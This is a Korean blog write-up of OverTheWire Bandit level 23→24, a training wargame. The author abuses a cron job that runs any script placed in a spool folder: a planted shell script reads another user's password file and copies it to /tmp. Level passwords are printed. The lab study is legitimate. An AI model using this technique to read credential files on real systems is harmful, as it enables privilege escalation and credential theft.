[Bandit-OverTheWire] Level 23 -> Level 24

두비니

·

2020. 9. 25. 08:02

 

 

Bandit Level 23 → Level 24

Level Goal

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!

NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…

Commands you may need to solve this level

cron, crontab, crontab(5) (use “man 5 crontab” to access this)

 

 

접속

접속 : ssh bandit23@bandit.labs.overthewire.org -p2220
pw : jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n

 

bandit23@bandit:~$ cat /etc/cron.d/cronjob_bandit24
@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
bandit23@bandit:~$ cat /usr/bin/cronjob_bandit24.sh 
#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
        echo "Handling $i"
        owner="$(stat --format "%U" ./$i)"
        if [ "${owner}" = "bandit23" ]; then
            timeout -s 9 60 ./$i
        fi
        rm -f ./$i
    fi
done

 

코드의 내용은 /var/spool/bandit24안에있는 모든 스크립트를 실행시킨 뒤 60초 뒤에 지운다고 하네요.

그럼 지워지기 전에 /etc/bandit_pass/bandit24안에 있는 내용을 복사해봅시다.

 

bandit23@bandit:~$ mkdir -p /tmp/dubini2
bandit23@bandit:~$ cd /tmp/dubini2
bandit23@bandit:/tmp/dubini2$ cat dump.sh
cat: dump.sh: No such file or directory
bandit23@bandit:/tmp/dubini2$ cat > dump.sh
#!/bin/bash
cat /etc/bandit_pass/bandit24 > /tmp/dubini2/bandit_pass

^C                                     
bandit23@bandit:/tmp/dubini2$ chmod 777 dump.sh
bandit23@bandit:/tmp/dubini2$ chmod 777 /tmp/dubini2
bandit23@bandit:/tmp/dubini2$ cp dump.sh /var/spool/bandit24/
bandit23@bandit:/tmp/dubini2$ 
bandit23@bandit:/tmp/dubini2$ cat bandit_pass
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ

 

이렇게 하면 되는데 간단하게 설명할게요

일단 tmp에 제 폴더를 하나 만들어서 dump.sh라는 파일을 통해 bandit24 비밀번호를 제 폴더에 복사되게끔 하는 코드를 작성합니다.

그리고 난 뒤 쓰기권한문제때문에 디렉토리와 파일에 권한을 부여하고

마지막으로 dump.sh를 /var/spool/bandit24로 복사해주면 끝입니다.

그럼 복사가 잘 되어있는걸 볼 수 있습니다.

끝!